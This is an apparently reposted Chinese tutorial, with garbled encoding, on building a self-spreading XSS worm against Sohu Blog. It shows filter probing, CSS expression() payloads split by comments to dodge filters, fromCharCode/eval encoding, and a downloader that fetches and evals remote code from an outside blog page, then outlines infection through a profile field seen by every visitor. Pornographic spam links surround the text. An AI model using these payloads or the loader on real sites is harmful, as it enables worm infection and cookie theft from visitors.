最新国产好看的视频,伊人天堂AV在线,国产Aaaaaa视频,蜜臀视频在线观看一区,人妻av色图,密臀久久久精品影片,青青视频免费观看毛片,久草在线观看视,国产三级精品色情在线

完整的XSS wrom入侵實現(xiàn)流程

互聯(lián)網(wǎng)   發(fā)布時間:2008-10-08 19:38:24   作者:佚名   我要評論
我先拿SOHU BLOG做示范. 1.測試過濾字符,下面都是構造XSS所需要的關鍵字符(未包含全角字符,空格是個TABLE,/前是真正的空格),在個人檔案處看過濾了哪些. ’’;:!--"<javascript JAvaSCriPT>=&#{()} / 結果 ’’;:!--"=&#{()} //
我先拿SOHU BLOG做示范.

1.測試過濾字符,下面都是構造XSS所需要的關鍵字符(未包含全角字符,空格是個TABLE,\/前是真正的空格),在個人檔案處看過濾了哪些.

’’;:!--"<javascript JAvaSCriPT>=&#{()} \/

結果

’’;:!--"=&#{()} // (&后是amp,論壇過濾了)

過濾了"javascript","&"和"\"這兩個轉義字符串,因此HTML轉碼和CSS樣式轉碼已無效,只好從屬性和事件入手.

2.測試一個XSS常用屬性和兩個事件,貌似沒有過濾字符.
expression
onerror
onload

3.下面開始嘗試構造語句.如下:

<img src="#" style="Xss:expression(alert(’xss’));">

<img src="#" onerror=alert(’xss’)>

<img src="/Article/UploadFiles/200702/20070202101404522.jpg" onload=alert(’xss’)>

構造完整標記,頁面輸出后又全部過濾.

4."/"字符沒有過濾因此可以構造/*xxxx*/注釋符,expression屬性可以配合注釋符構造出語句:

<div style="xss:ex/**/pre/**/ssion(alert(’xss’))">

5.由于expression屬性比較特殊想當于一個死循環(huán)的EVAL函數(shù),同時style標記里不能出現(xiàn)";"字符,也就是不能構造多條連接在一起的javascript,因此構造出如下語句:

<DIV STYLE="xss:ex/**/pre/**/ssion(eval(xss));" xss="var Then=new Date();Then.setTime(Then.getTime() 10*1000);if(document.cookie.indexOf(’Cookie1=’) == -1){document.cookie=’Cookie1=RAY;expires=’ Then.toGMTString();alert(’xss’);}">

//設置一個COOKIE在10秒后失效,并在這條COOKIE語句中執(zhí)行其他語句或函數(shù).

6.遺憾的是SOHU BLOG對于標記內不合適的內容都會過濾,因此我們無法eval標記內的某個變量,于是采用fromCharCode方法,將Unicode字符值專成字符串再用eval函數(shù)執(zhí)行:

<div style="xss:ex/**/pre/**/ssion(eval(String.fromCharCode(97,108,101,114,116,40,39,120,115,115,39,41)))">

7.感染流程考慮:

㈠.BLOG頁面的個人檔案處是頁面通用的,

㈡.XSS內容寫到個人檔案處,所有瀏覽者都會觸發(fā)XSS

㈢.實現(xiàn)一段提交XSS內容到個人檔案的代碼.

8.個人檔案處只能輸入2048個字符,又采用了fromCharCode方法,因此出現(xiàn)XSS代碼長度的限制,因此只能調用遠程代碼,于是寫出了個XSS downloader.

主要代碼:

function d(){
a=new ActiveXObject(’Microsoft.XMLHTTP’); /*調用XMLHTTP控件
a.Open(’get’,’http://s0n9.blog.sohu.com/31406970.html’,false);/*發(fā)出一個GET提交請求
a.send();
b=a.responseText; /*將傳回值賦給變量B
eval(unescape(b.substring(b.indexOf(’--|’) 3,b.indexOf(’|--’))));
/*用indexOf計算 --|********|-- 的位置,用substring方法取出字符串,最后用unescape方法解碼.
}d()

http://s0n9.blog.sohu.com/31406970.html 頁面代碼:

alert('xss');
/*利用escape將標點符號轉碼,由于responseText特性,某些字符會轉換,如"&"字符會變成"&"(&后是amp,論壇過濾了)

PS:其他傳染和詳細的偽造提交的過程略去,各門戶網(wǎng)站小心,過濾好XSS關鍵字,以防止XSS WROM爆發(fā)






相關文章

最新評論

南和县| 罗江县| 宝应县| 利川市| 沅江市| 保定市| 乌苏市| 恩施市| 巨鹿县| 通许县| 双江| 潮州市| 昌邑市| 闽侯县| 常山县| 平安县| 罗甸县| 阿瓦提县| 台中县| 齐河县| 稻城县| 黔西| 青阳县| 车险| 东莞市| 班戈县| 阿巴嘎旗| 澄迈县| 柞水县| 云林县| 衡水市| 克什克腾旗| 霍林郭勒市| 双桥区| 西峡县| 孟州市| 濉溪县| 万盛区| 吉首市| 明溪县| 新乡县|